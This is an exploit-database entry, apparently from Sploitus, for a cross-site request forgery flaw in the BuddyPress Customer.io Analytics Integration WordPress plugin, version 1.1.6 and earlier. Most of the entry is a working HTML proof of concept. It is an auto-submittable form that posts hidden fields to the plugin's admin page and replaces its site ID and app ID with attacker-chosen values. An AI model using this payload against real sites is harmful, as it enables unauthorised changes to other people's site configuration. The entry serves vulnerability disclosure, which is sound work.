Exploit for BuddyPress Customer.io Analytics Integration <= 1.1.6 - Arbitrary Plugin Settings Update via CSRF

Name: Exploit for BuddyPress Customer.io Analytics Integration <= 1.1.6 - Arbitrary Plugin Settings Update via CSRF
Rating: 5 (341 reviews)

2021-06-30 | CVSS 1.8

## https://sploitus.com/exploit?id=WPEX-ID:DF1FDCA8-D08F-4577-8CDF-67CA1AC741BA
<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?page=bpcustomerio" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="bpcustomerio_enable" value="0" />
      <input type="hidden" name="bpcustomerio_pnce" value="0" />
      <input type="hidden" name="bpcustomerio_site_id" value="attacker" />
      <input type="hidden" name="bpcustomerio_appid" value="csrf" />
      <input type="hidden" name="bpcustomerio_intigration" value="Save Settings" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>